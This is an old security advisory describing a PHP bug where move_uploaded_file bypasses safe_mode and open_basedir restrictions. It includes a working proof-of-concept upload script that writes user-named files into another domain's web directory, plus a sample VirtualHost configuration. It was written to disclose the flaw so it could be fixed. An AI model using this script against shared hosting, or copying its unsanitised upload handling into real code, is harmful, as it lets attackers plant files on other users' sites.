|
COMMAND php safe mode broken via \"move_upload_file\" directive SYSTEMS AFFECTED Php ?? PROBLEM Tozz reported : Its possible to circumvent PHP safe_mode restrictions by using move_uploaded_file. Exploit : ======= <? $file = $HTTP_POST_FILES[\'file\'][\'name\']; $type = $HTTP_POST_FILES[\'file\'][\'type\']; $size = $HTTP_POST_FILES[\'file\'][\'size\']; $temp = $HTTP_POST_FILES[\'file\'][\'tmp_name\']; $size_limit = \"100000\"; // set size limit in bytes if ($file){ if ($size < $size_limit){ move_uploaded_file($temp, \"/domains/somebodyelse.org/public_html/www/test/\".$file); echo \"The file <tt>$file</tt> was sucessfully uploaded\"; } else { echo \"Sorry, your file exceeds the size limit of $size_limit bytes\"; }} echo \" <form enctype=\'multipart/form-data\' action=$PHP_SELF method=post> Upload a file: <input name=\'file\' type=\'file\'> <input type=\'submit\' value=\'Upload\'> </form> \"; ?> The attacker moved the uploaded file to: \"/domains/somebodyelse.org/public_html/www/test/\" while the user is restricted with both safe_mode and open_basedir, this user is able to upload any file where the apache user has write access. Virtualhost configuration snippet: <VirtualHost IP_HERE> DocumentRoot /domains/whatever.com/public_html/root/ ServerName root.whatever.com CustomLog /domains/whatever.com/logs/access_log combined ErrorLog /domains/whatever.com/logs/error_log php_admin_value safe_mode 1 php_admin_value open_basedir /domains/whatever.com/public_html/root/ </VirtualHost> SOLUTION Patch was comitted to CVS, release should go out anytime soon.